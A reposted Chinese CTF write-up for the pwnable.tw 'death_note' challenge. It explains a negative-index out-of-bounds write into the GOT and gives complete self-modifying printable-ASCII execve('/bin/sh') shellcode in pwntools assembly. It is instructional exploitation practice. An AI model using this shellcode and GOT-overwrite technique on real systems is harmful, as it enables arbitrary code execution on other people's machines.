?

題目邏輯比較簡單，大概增加和刪除和打印三個功能：

show函數中，打印各日記內容，由于這題沒有給出libc文件，應該不需要泄露地址，估計用處不大：

delete函數中，正常的free，然后指針修改為null，可能不存在漏洞，唯一的bug在于read_int()函數中

readint函數使用了atoi函數，當輸入是“-12”這樣的負數時，造成讀越界，但是由于在delete函數中，用處不是特別大

最后，add函數

?

?函數的邏輯是在note數組中寫入malloc的返回的指針，并且同樣用了readint函數，可以發現存在越界寫的問題，而note變量在bss段上，可以想到覆寫got表：

?

?而檢查一下文件開啟的保護，沒有開啟NX保護，也就是可以寫入shellcode，這樣put@got指向malloc返回地址，malloc塊中寫入shellcode，便可以獲得shell。

而針對用戶輸入，還有一個函數用來檢測，

因此需要保證用戶輸入范圍是從2F~7F范圍內。即考察shellcode的編寫。

常見的shellcode思路是利用int 80h陷入軟中斷，

并使得eax內容為0x0b，ebx指向一個字符串"/bin/sh"，ecx、edx置0。如shellcraft.sh()

/* execve(path='/bin///sh', argv=['sh'], envp=0) *//* push '/bin///sh\x00' */push 0x68push 0x732f2f2fpush 0x6e69622fmov ebx, esp/* push argument array ['sh\x00'] *//* push 'sh\x00\x00' */push 0x1010101xor dword ptr [esp], 0x1016972xor ecx, ecxpush ecx /* null terminate */push 4pop ecxadd ecx, esppush ecx /* 'sh\x00' */mov ecx, espxor edx, edx/* call execve() */push SYS_execve /* 0xb */pop eaxint 0x80

但在匯編以后，不能滿足我們的要求。

根據某大牛博客中寫到，此題可用的匯編指令如下:

1.數據傳送: push/pop eax… pusha/popa2.算術運算: inc/dec eax… sub al, 立即數 sub byte ptr [eax… + 立即數], al dl… sub byte ptr [eax… + 立即數], ah dh… sub dword ptr [eax… + 立即數], esi edi sub word ptr [eax… + 立即數], si di sub al dl…, byte ptr [eax… + 立即數] sub ah dh…, byte ptr [eax… + 立即數] sub esi edi, dword ptr [eax… + 立即數] sub si di, word ptr [eax… + 立即數]3.邏輯運算: and al, 立即數 and dword ptr [eax… + 立即數], esi edi and word ptr [eax… + 立即數], si di and ah dh…, byte ptr [ecx edx… + 立即數] and esi edi, dword ptr [eax… + 立即數] and si di, word ptr [eax… + 立即數]xor al, 立即數 xor byte ptr [eax… + 立即數], al dl… xor byte ptr [eax… + 立即數], ah dh… xor dword ptr [eax… + 立即數], esi edi xor word ptr [eax… + 立即數], si di xor al dl…, byte ptr [eax… + 立即數] xor ah dh…, byte ptr [eax… + 立即數] xor esi edi, dword ptr [eax… + 立即數] xor si di, word ptr [eax… + 立即數]4.比較指令: cmp al, 立即數 cmp byte ptr [eax… + 立即數], al dl… cmp byte ptr [eax… + 立即數], ah dh… cmp dword ptr [eax… + 立即數], esi edi cmp word ptr [eax… + 立即數], si di cmp al dl…, byte ptr [eax… + 立即數] cmp ah dh…, byte ptr [eax… + 立即數] cmp esi edi, dword ptr [eax… + 立即數] cmp si di, word ptr [eax… + 立即數]5.轉移指令: push 56h pop eax cmp al, 43h jnz lable<=> jmp lable6.交換al, ah push eax xor ah, byte ptr [esp] // ah ^= al xor byte ptr [esp], ah // al ^= ah xor ah, byte ptr [esp] // ah ^= al pop eax7.清零: push 44h pop eax sub al, 44h ; eax = 0push esi push esp pop eax xor [eax], esi ; esi = 0

可以先看一下，執行shellcode時的寄存器狀況：

根據如上的寄存器情況，shellcode可以寫成這樣：

shellcode = '''/* execve(path='/bin///sh', argv=0, envp=0) *//* push '/bin///sh\x00' */push 0x68push 0x732f2f2fpush 0x6e69622fpush esppop ebx/*rewrite shellcode to get 'int 80'*/push edxpop eaxpush 0x60606060pop edxsub byte ptr[eax + 0x35] , dlsub byte ptr[eax + 0x35] , dlsub byte ptr[eax + 0x34] , dlpush 0x3e3e3e3epop edxsub byte ptr[eax + 0x34] , dl/*set zero to edx*/push ecxpop edx/*set 0x0b to eax*/push edxpop eaxxor al, 0x40xor al, 0x4b /*foo order,for holding the place*/push edxpop edxpush edxpop edx ''' shellcode = asm(shellcode) + '\x6b\x40'

?

轉載于:https://www.cnblogs.com/p4nda/p/7611275.html

總結

以上是生活随笔為你收集整理的【pwnable.tw】 death_note的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。